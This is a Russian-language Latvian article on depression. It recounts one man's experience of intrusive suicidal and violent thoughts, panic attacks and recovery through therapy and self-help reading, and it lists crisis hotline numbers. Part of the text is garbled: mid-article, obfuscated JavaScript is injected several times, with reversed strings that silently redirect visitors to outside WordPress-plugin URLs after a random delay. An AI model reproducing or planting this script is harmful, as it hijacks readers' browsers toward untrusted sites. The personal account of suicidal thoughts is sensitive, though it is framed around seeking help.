БОЛЬШАЯ И ЧЕРНАЯ ПУСТОТА – ДЕПРЕССИЯ
Депрессия – в последнее время кажется, что это слово получило по меньшей мере презрительное значение, которое используют туда-сюда, описывая плохое настроение или просто неудавшийся день. Что такое депрессия? Как она проявляется и, кто может помочь?
Депрессия – это болезнь, которая не проходит сама по себе. Она не исчезает, если покинешь учебу, не станешь встречаться с друзьями и залезешь глубоко под одеяло на долгие недели. Имеется множество симптомов, которые могут свидетельствовать о том, что нежданный гость явился – длительно плохое настроение, отсутствеи интереса, избыток сил и пропавший аппетит. Однако не всегда эти симптомы указывают на депрессию.
Каждый год 10-го октября отмечается Международный день духовного здоровья. Чтобы убедить людей заботиться о своем здоровье и здоровье своих близких, важно называть вещи своими именами. Если бы духовные заболевания мы воспринимали также серьезно, как и физические, возможно это спасло бы сотни и даже тысячи людей в Латвии. У депрессии нет границ, и она не выбирает людей по полу, расе, религиозной принадлежности или политической убежденности.
Андрею (имя изменено) поставлен диагноз – клиническая депрессия. «Впервые я понял, что что-то не так примерно два года назад. Я жил в Риге, в общежитие. Сидел на подоконнике первого этажа, курил, и вдруг подумал: «Блин, можно было бы выпрыгнуть из окна.» Эта мысль появилась из ниоткуда. Что можно было бы выпрыгнуть и завершить все это мероприятие (то есть свою жизнь). В тот момент я появился стресс, я своему мозгу задавал вопрос «Что за фигня?». Это такой первый шок, когда понимаешь, что что-то не так. Я был реально испуган.»
Как рассказывает Андрей, после того вечера стало немного легче, однако через некоторое время агрессивные и навязчивые мысли вернулись. ««О, этому бы человеку топор в голове оставить!» — нет, я не хотел этого делать, но подобные мысли казались такими же обыденными как мысль о том, что надо покушать или сходить в магазин. Так это все продолжалось все лето, но этот период своей жизни я помню плохо.»
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc/rettelswen/moc.cniwyks//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria-hall-waldhauser-44438.jpg» />Изображение: unsplash.com
Отдельные события или действия могут обострить имеющиеся чувства и эмоции. Андрей рассказывает, что заранее знал – смотреть с друзьями фильм о серийных убийцах будет далеко не самым лучшим вариантом в его случаи. Фильм все-таки решили смотреть, однако на протяжении всего фильма в его голове крутились вопросы – «А может и я мог бы стать таким человек? Может и я могу быть убийцей?» Такие вот ситуации могут быть причиной навязчивым мыслям, которые крутятся в голове без остановки. «В тот момент у меня не было ни малейшего понятия о том, что со мной происходит. Я чувствовал как-будто я нахожусь в полном тумане.»
Но я ведь не могу вот так вот просто пойти и кому-то рассказать «Слушай, у меня вот такая проблема. Я в последнее время думаю о том, что мог бы стать серийным убийцей.»
Решение о том, что все же стоит что-то делать, Андрей принял после того, как однажды вечером буквально вытолкнул из квартиры своб подругу, боясь ей сделать что-то плохое. В голове снова как скоростной поезд неслись мысли о том, что можно было бы закончить и свою жизнь, и жизнь подруги. «На следующий день я звонил психотерапевту, и она мне ответила, что может принять меня через месяц. Но мне надо было сейчас. Потому что через месяц, возможно, было бы уже и некого принимать.» И все же только через месяц, что казалось бесконечностью, Андрей впервые посетил врача, чтобы говорить о своей проблеме.
“Все это время мне казалось, что я схожу с ума, но я активно старался искать какие-то решения ситуации. В данном случае моим преимуществом было то, что я никогда не опускаю руки. Насколько бы плохо не было. Я всегда ищу решение. И в этой ситуации тоже – я все время что-то читал, смотрел, что могу делать. Помню, как шел бегать, и представлял, что депрессия является чем-то таким наружным, от чего я убегаю. Таким образом я себя развлекал в тот момент.»
При депрессии чувство такое, что я агрессивен и ядовит по отношению сам к себе. Словно я нахожусь в таком помещении, откуда никак не уйти.
«Проблема в том, что кто-то со стороны может сказать «Да ну, брось, все хорошо, наслаждайся жизнью!» Но загвоздка в том, что у меня не было ни радости, ни удовлетворения ни от чего. Те вещи, который раньше казались чем-то особенным, теперь были просто ничем. Мне особо жалко было, что даже самая вкусная еда мне казалась противной, мне ничего не хотелось. Мне просто надоело есть, я шел в магазин и мне ничего не хотелось. Примерно полгода я провел с чувством, что потихонечку теряю разум. Я порой думал, что было бы хорошо, чтобы со мной что-то случилось, и чтобы это все закончилось и я не сделал никому ничего плохого. Это такое непонятное чувство, которое тяжело описать словами.»
Возможно, что каждый из нас хоть раз был взволновам или нервничал, но следует иметь ввиду, что в случае с депрессией человек может переживать панические атаки, быть все время тревожным. Андрей вспоминает, что подобные случаи ему были знакомы: «Один из таких симптомов была странная работа сердца. Вроде стучит нормально, а потом возьмет и остановится на пару ударов, а потом снова стучит.» Помню свою первую паническую атаку, которая произошла еще перед всем тем, что я ранее описал. Я лежал в постели, пытался уснуть и в мыслях видел, как стою в магазине у полки и не могу выбрать, что хочу купить. Кажется, очень глупо, но я никак не мог отбросить эту мысль. Я в мыслях стою там и не могу решить, что хочу купить, и никак не могу освободиться от этой мысли. И это получается, как такой цикл, когда стресс о том, что никак не освободиться от этой мысли, и стресс нарастает и достигает такого уровня, что в один момент понимаешь, что находишься в панике. Я в тот момент еще не знал, что это такое. Мне было тяжело дышать, я был в холодном поту, меня трясло.
Изображение: unsplash.com
Андрей считает, что нет такого уникального метода, который помог бы всем, у кого депрессия, однако это не значит. Для начала следует поговорить со своим семейным врачом или психологом. Говорить об этом и признать самому себе, что проблема существует. Он делится опытом, который помог ему выбраться из ямы и одолеть чувство пустоты: «Начал понимать, что идти к психотерапевту совсем неплохо. Правда, если сам не хочешь ничего менять и с собой работать, никто помочь не сможет. Я и до этого искал какие-то решения, но в тот момент для себя открыл стоицизм. Это направление философии, по которому то, как я себя чувствую, не имеет значения. Работал с тем, что у меня было в голове и все было более-менее нормально.»
«В то время я активно работал на своей основной работе, и трудности мне создавало то, что вместе с депрессией у меня была огромная тяга к прокрастинации. Я не могу заставить себя делать даже самые элементарные вещи.» Исследуя материалы о стоицизме, нашел книгу одного из основоположников когнитивной психологии Дэйвида Бернса (David Burns) «Чувствовать себя хорошо». Я достаточно скептично отношусь к подобной литературе, но подумал, что терять нечего и решил попробовать. Через две недели я сам для себя отметил, что на самом деле чувствую себя вполне окей.»
Изображение: unsplash.com
Проходит ли депрессия? Или она все время будет продолжать дышать в затылок? «Я считаю, что это бесконечная борьба, ходьба по скользкому склону, с которого никак не могу сойти. Я сам создал себе такие обстоятельства, при которых меня окружают люди, которые не позволяют мне утонуть в старых проблемах.»“ Это очень важный аспект – какие люди тебя окружают. Если вокруг тебя люди, которые не понимают и не могут помочь, при это говоря, что депрессия — это ерунда и не стоит грустить, надо наслаждаться жизнью, то тяжело. К счастью, у меня был друг с похожим опытом, который свои проблемы разрешил, и таким образом он меня вдохновлял, давал советы.»
«Думаю, что со всеми духовными проблемами можно справиться, но нужно активно работать, чтобы не поддаться всему этому. Очень часто я себя чувствую замечательно, но я активно работаю, чтобы так оно было. Это зависимость, от которой можно избавиться, но тяжело удержаться. Например, если ты прекращаешь пить, ты больше не можешь выпить что-то чуть-чуть, потому что по каким-то причинам твоя зависимость может проснуться. Также и с депрессией.“
Я считаю, что каждому, кто чувствует, что с ним что-то не то, следует искать помощь. Духовные болезни также серьезны, как и физические, но при этом очень важно не принимать роль жертвы.
Если Тебе необходима помощь:
Телефон доверия кризисного центра “Skalbes” 67222922, 27722292 (BITE)
Бесплатный телефон доверия для детей и подростков 116111 (8.00 – 23.00)
Бесплатный телефон доверия для детей и подростков 80009000 (круглосуточно), 28809000 (TELE2 9.00 – 23.00), 1860 (BITE 9.00 – 23.00)
Телефон психологической помощи родителям 67814792 (понед. и среда с 13.00 до 16.00) www.bernutalrunis.lv